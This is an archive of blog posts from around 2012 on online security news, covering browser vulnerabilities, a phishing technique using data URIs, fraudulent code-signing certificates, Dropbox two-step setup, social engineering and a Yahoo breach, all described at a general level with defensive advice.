Tag Archives: Online Security

Just a day after releasing Firefox 16, Mozilla pulled the update citing security concerns. Needless to say this was a pretty unusual move. Typically any security vulnerability present in a major release is fixed through point updates. Removing a new release was a drastic move, which indicated that Mozilla reckoned that the vulnerability had a significant chance of being exploited in the wild.

The vulnerability concerned could allow a malicious site to potentially determine which websites users have visited and have access to the URL or URL parameters. The security vulnerability was actually more of a privacy issue that could become a security issue on stupidly coded websites that use GET to transmit confidential information.

Mozilla released a fix for the Android version yesterday, and an updated desktop version was released moments ago. You can download Firefox 16.01 from here, or you can wait for your Firefox installation to automatically download the latest version.

The second installment of Google’s hacking fest Pwnium has just wrapped up, and once again Google Chrome’s security features were successfully bypassed. Earlier this year, Chrome fell for the first time when VUPEN managed to exploit Chrome within five minutes at the first installment of Pwnium. During the same event, two more hackers – Pinkie Pie and Sergey Glazunov, managed to humble Chrome and bag the top award of $60,000.

The second edition of Pwnium was organized as a part of the ‘Hack in the Box 2012′ security conference held in Kuala Lumpur. This time around, Chrome’s sandboxing mechanism was defeated by exploiting two flaws – an “SVG use-after-free” and an “IPC arbitrary write”. The exploiter was once again Pinkie Pie. Since his exploit depended entirely on bugs within Chrome to achieve arbitrary code execution, it qualified for Google’s highest award level as a “full Chrome exploit”, and won him $60,000 and a free Chromebook.

Detailed explanation of the bugs leveraged by Pinkie Pie is still not available. However, the good news is that Google has already patched the vulnerability, so even if you use Chrome, you are safe. Google deserves a round of applause for not only encouraging the security community to discover bugs in Chrome, but also for patching the vulnerability in less than twelve hours after its disclosure.

If you are still using Internet Explorer 9 or below, here is one more reason to upgrade to Internet Explorer 10, or perhaps take a look at one of the many excellent free alternatives. A critical zero-day vulnerability has been uncovered in Internet Explorer that could allow a remote hacker to execute arbitrary code on your system even if you simply browse to an infected page. The vulnerability is already being actively exploited in the wild. Affected versions include Internet Explorer 6, 7, 8, and 9.

Eric Romang was the first to report the vulnerability, which has since been confirmed by Microsoft. The exploit has four main components: the Exploit.html file which acts as the starting point, the Moh2010.swf flash file that is responsible for spraying the heap with the payload that will be executed, the Protect.html file that is the actual trigger for the vulnerability, and additional malicious components that are downloaded and executed on the compromised system by the payload. The payload being dropped by the flash file has been identified to be the infamous Poison Ivy trojan.

If Internet Explorer 10 is not supported on your system and you don’t want to move to an alternate browser, Microsoft is recommending that you add Internet Explorer to the Enhanced Mitigation Experience Toolkit, or set Internet and Local intranet security zone settings to “High” to block ActiveX Controls and Active Scripting. Detailed workaround instructions are available in Microsoft’s Security Advisory.

Wikipedia defines a digital certificate as ‘an electronic document which uses a digital signature to bind a public key with an identity — information such as the name of a person or an organization, their address, and so forth. The certificate can be used to verify that a public key belongs to an individual.’

In the case of software, it is used to ensure that the software is what it claims. Operating Systems use digital certificates to make sure that an application that is being installed is valid. But what if the digital certificate is obtained by giving fake information?

There have been cases in the past were malware authors used stolen digital certificates for their rogue apps. But according to a report from Kaspersky, a group of Brazilian Trojan authors was able to obtain genuine certificates from Comodo by using fake data.

The authors used a fake company name gastecnology.org for obtaining the certificate. As shown in the Securelist blog, a simple DNS lookup of that particular domain name gives use some clues as to the veracity of that company.

Firstly, the email address used to register the account is a free Yahoo Mail account and secondly, the phone number as well as the address provided was fake.

After obtaining the digital certificate, the malware authors used an extensive email campaign to spread the malware. The certificate has been revoked since then and the application is now flagged as malware.

Although the certificate was revoked, the big question here is why the certificate was allowed in the first place. Since digital certificate plays an integral part in verifying the validity of an application, signing an application should be only done after verifying the submitted data which was not the case here. Hopefully certification authorities will be more careful after this incident.

Nowadays everyone will be familiar with phishing attacks. It is basically the process of obtaining confidential information from a person by communicating with the victim (using emails, phone calls etc.) posing as someone else. The typical phishing attack includes creating a fake login page, storing them in a server and emailing the victim with the fake login page link. Now a new research paper from InfoSec student, Henning Klevjer shows how a hacker can create phishing attacks without the need for storing the fake login page on a server.

This method uses URI or universal resource identifier which is basically a string of characters that are used to identify a name or a resource. Using URI, the required data (the code for login page in this case) is stored within the URI with the following scheme

data:[<mediatype>][;base64],<data>

Here <data> will contain the fake login page. The procedure for creating a phishing URI starts with creating a login page using the code from the original page. The original code is modified accordingly so that the entered data such as password are sent to a location as desired by the hacker. This page is then encoded using a scheme called Base64. Base64 is a method of encoding binary data to ASCII format which will increase the data size by around 33%. The next and the final step is to append this information to the URI.

The final URI will be extremely long and suspicious looking one. But as all browsers support legacy URI schemes, it will be rendered properly, as long as it doesn’t extend more than the maximum URL limit allowed by the browser.

Although, the large URI can be masked using a URL shortening service, Henning states that this method has some major limitations thanks to implementation of data URIs in Chrome and Internet Explorer.

Dropbox has been under fire more than once for their inability to protect user’s data. But now it looks like they are finally improving their security. Dropbox has now added an option to use two step authentication for all of its users. Here’s how to enable it.

You will find a new option to enable two-step authentication in the bottom as shown below. It will be disabled at the moment. Click Change.

You will have to enter your password to proceed. Then you will see a webpage overlay like shown below. Click Get Started.

You can choose to receive the authentication codes as text messages to your phone. Alternately, if you own a smartphone, you can use an authenticator app to generate authentication codes locally. Select the desired option and click ‘Next’.

Now if you selected the option to receive code via text message, enter your mobile number or if you chose to use the authenticator app, scan the provided QR code using any supported authenticator app.

When done, click ‘Finish’. You have now enabled two step verification for Dropbox.

You will have to download and install the Dropbox application for your OS again with the latest versions that support 2-factor authentication.

In the last two decades, we have seen a lot of changes around us. We have moved from standard definition to high definition content, dial-up internet to high speed broadband communication and our mode of interaction with devices are also changing with touch and voice input becoming more common. We have also changed our way of communicating and storing data. A lot of our data is stored online in the cloud and most of the communication is online through Twitter, Facebook etc.

Along with the aforementioned changes, our security policies are also changing. With us trusting more and more of our data with technology companies, it is vital for us to ruminate about their security procedures. In the early nineties, the security policies were framed based on the core principles known as CIA – confidentiality, integrity and availability. But times have changed and so have the bad guys. We can no longer rely on the old principles alone. Our security policies have to evolve and that too fast. But are we moving fast enough? Let’s take a look.

Just a few weeks ago, WIRED editor, Mat Honan’s iCloud account was compromised along with his Amazon account. Using the hacked iCloud account, the hacker remotely wiped data from his iPhone, iPad and MacBook. How was the hacker able to do it? Shockingly, just by calling Apple customer support! The hacker was able to get all of the information required to take control of an account from the internet and Amazon using social engineering. You can read the entire story here.

This is just one example. You can find a number of incidents like this. Interestingly, most of today’s attacks use social engineering as the preferred method. But have the technology sectorw evolved enough to protect themselves and customers from these type of attacks? The truth is, while certain companies are trying their best, most or a lot of companies do not think outside the box. In a SANS white paper titled “A Multi-Level Defense Against Social Engineering”, David Gragg quotes Keith A. Rhodes, chief technologist at the U.S. General Accounting Office as follows.

He notes, “Very few companies are worried about this. Every one of them should be.”

Considering that a large number of attacks in 2011 were using social engineering, we can easily conclude that his words are very much true. Still, the unfortunate truth is that companies are not training its staff on detecting social engineering tactics. For example, a large number of tech companies rely on personal information to reset password. At the current age of social network, that information is fairly easy to obtain as shown by the Mat Honan incident. By not taking our current technological ecosystem into consideration, these companies are effectively creating a loophole that the hackers can make use of.

But every time a data breach occurs, can we blame the company or the client? Ted Claypoole, author of ‘Protecting Your Internet Identity: Are You Naked Online?’ says that at certain levels, preventing hacking is just impossible.

“Everyone is hacked. Sometimes a company has a big loss, and other times smaller losses. But professional criminals are testing weaknesses all the time, technology changes constantly, and all businesses have been a victim, or will be a victim. Some never know it.

There is no such thing as impenetrable security. For a thing to have value, you must be able to use it. And if you can reach it to use it, then so can a bad guy. Sometimes they impersonate the account holder. Sometimes they take jobs inside the company and become the security flaw. Sometimes they exploit the technology. But every company has “insufficient security policies” by your measure, because every company is vulnerable. Anyone who tells you that their major company has never been breached is either lying, naïve or both.

Last year a hacker, probably foreign government sponsored, broke into RSA, one of our very top security companies, and took information that could allow the hackers to hack defense contractors (like Lockheed Martin).

Our financial protection from harm lies not in company security policies, but in the system itself. This is why we have a $50 fraud limit on our credit cards, and why, when someone breaks in to steal up to $100,0000 of your money from the bank, they did not just steal your money – they either stole the bank’s money or the government’s money, and yours will be returned. The system eats billions in fraud each year and we all pay a little bit for it, so that the losses are not as unevenly distributed if it happens to you. So I question your assumption that companies who are hacked have insufficient security policies. Resources are limited. We can all spend only so much time and money on security. Sometimes you can have the top security in the world, and the bad guys are simply better.”

And that is certainly true. At times, the bad guys are just too good for us to prevent an incident. But that shouldn’t deter us from creating strong security policies and training our staff to prevent incidents such as the one that happened to Mat. The truth is that most of the time, the data breach would have been completely avoidable (96% of breaches in 2011 were avoidable according to Verizon Business Data Breach Investigations Report, 2011). For example, Microsoft India’s online store was hacked last year and password and credit card data was stolen. Apparently, the company that managed the store on behalf of Microsoft didn’t even bother to encrypt the passwords making the hacker’s job a walk in the park.

So what can we do to improve our current security infrastructure? What we need is a holistic approach in dealing with creation of new security policies considering the latest trends and method of attacks. The policies should evolve fast enough as the attack vectors evolve. Now this is not an easy thing to do but it has to be done in order to safeguard our data. We could have an internationally valid security certification process similar to the ISO 270001 certification which analyses the security policies and practices of a company and rates the company on behalf of their policies. This will help customers in selecting the best in terms of security and will give the companies a necessary ‘push’ in framing the right policies.

Furthermore, the government can pass laws that prioritize the safeguard of consumer data. Unfortunately, there is no solid law in the US that focuses on protection of consumer data, says Ted. “Lawmakers in the United States are doing very little to force protection of user’s data. Other industrialized nations believe that data privacy and data security is a human right that their citizen’s hold. This country does not yet acknowledge any such right. We have laws protecting certain specific classes of information in certain circumstances – some health care data, financial data, and children’s information – but our data protection laws are confused and disjointed.”

While Senators are trying to pass laws such as SOPA for the benefit of the entertainment industry, it would be nice if they could spend a little bit of their valuable time in making solid laws to protect our data and as well as our identity online. Only effective security policies along with strong laws can bring about durable changes in the security infrastructure so that we can sleep tight without worrying about our data.

I am a big fan of the Batman franchise movies and have watched them the day they released. To be honest, I can’t wait to watch the latest in the series “Dark Knight Rises” on July 20. Dark Knight Rises is definitely going to break box office records all over the world. However, even before the movie has even released, there are several torrent websites which have been filled up with fake torrents for the Dark Knight Rises.

While you might get into trouble legally for downloading the content, there is a high chance that the torrents available on the internet are infected with viruses and spyware which might put your computer at risk.

Back in 2010, Harry Potter Deathly Hallows Part 1 was leaked on Torrent websites and was downloaded millions of times. That leak was potentially intentional because it left off a good part of the movie out of the torrent thus driving users back to the theatre to catch up the rest of the movie. There were also several instances of fake torrents which infected users who downloaded them. The Dark Knight Rises torrents are fake and targeted towards gullible users who will be infected with malware and spyware.

Reports are coming in that hackers have managed to hack into a Yahoo service and steal sensitive data of more than 453000 of its customers. According to a security firm, Trustedsec, who first reported the incident, the service that was compromised was Yahoo Voice.

The affected website was only named as a subdomain of yahoo.com however digging through and searching for the hostname, the attacker forgot to remove the hostname “dbb1.ac.bf1.yahoo.com” (credit to Mubix for the hostname find). Looking through a variety of sources, it appears that the compromised server was likely “Yahoo! Voice” which was formally known as Associated Content (credit to Adam Caudill for the linkage).

The hackers have posted the database containing the email ids and passwords as a proof. According to the dump, the hackers used a method called union based SQL injection to hack the database. It is a method, where one enter codes to improperly protected text boxes which treat them as commands.

The most scary part, according to TrustedSec, is that the passwords were stored as plain text without any kind of encryption. If this was indeed the case, it would have been a highly irresponsible action on Yahoo’s part.

The hackers posted the following statement along with the dump,

We hope that the parties responsible for managing the security of this subdomain will take this as a wake-up call, and not as a threat. There have been many security holes exploited in webservers belonging to Yahoo! Inc. that have caused far greater damage than our disclosure. Please do not take them lightly. The subdomain and vulnerable parameters have not been posted to avoid further damage.

If you are a Yahoo Voice customer, I recommend you change your password immediately and if you are using the same passwords for any other service (which is a bad practice), it is better to change that as well.

The second World Cyber Security Technology Research Summit met in Belfast recently and outlined a new research roadmap to tackle the problem of cyber crime on an international scale.

Belfast 2012 Report

The summit was sponsored by the Centre for Secure Information Technologies at Queen’s University, Belfast. It was attended by some heavy hitters in the security industry. According to the Queen’s University press release, it “included Chief Scientific Advisor from the UK Home Office – Professor Bernard Silverman, Cyber Security Division Director of US Homeland Security – Dr Douglas Maughan, Chairman and CEO of Kaspersky Labs – Eugene Kaspersky, Director of Innovation, Connected Energy Networks Cisco – Barbara Fraser, and Raj Samani, CTO, EMEA, McAfee.”

The final product of the conference resulted in four collaborative roadmap documents that focused on four distinct areas:

Adaptive Cyber Security Technologies – Systems need to have the ability to learn from cyber security events and learn on the fly. It was agreed that adaptive techniques could be risky for instance, if the system learns the wrong thing, but the consensus was that adaptive technologies were necessary and must be developed.

Protection of Smart Utility Grids – This addressed both physical and cyber security. One of the big focuses was on the standardization of smart meters and grid management systems.

Security of Mobile Platforms and Applications – The big challenge of this area is that mobility is too broad and it was agreed that no single source could develop security. Protecting the consumer was a big topic of conversation

Multifaceted Approach to Cyber Security Research – Some topics discussed here were sort of like a wish list. For instance, getting people to be as personally responsible for their own cyber security as they are physical security.

To be honest, as an IT Manager, the information flowing out of this summit is both fascinating and overwhelming. Some fantastic resources and presentations can be found on the “Belfast 2012″ website at http://www.csit.qub.ac.uk/News/Events/Belfast2012/. Anyone interested in cyber security and getting a glance at what the big players in the biz are thinking should view this material.

CSIT Principal Investigator, Professor John McCanny, said, “Ultimately our objective is to help make the Internet of tomorrow a safe and secure platform which is vital for global economic growth and societal development.” I say that is a tall order, but due to the many rogues lurking in every corner of our world, it’s an objective that has to be met. When it’s all said and done, I wouldn’t put my money on freedom as being their top priority.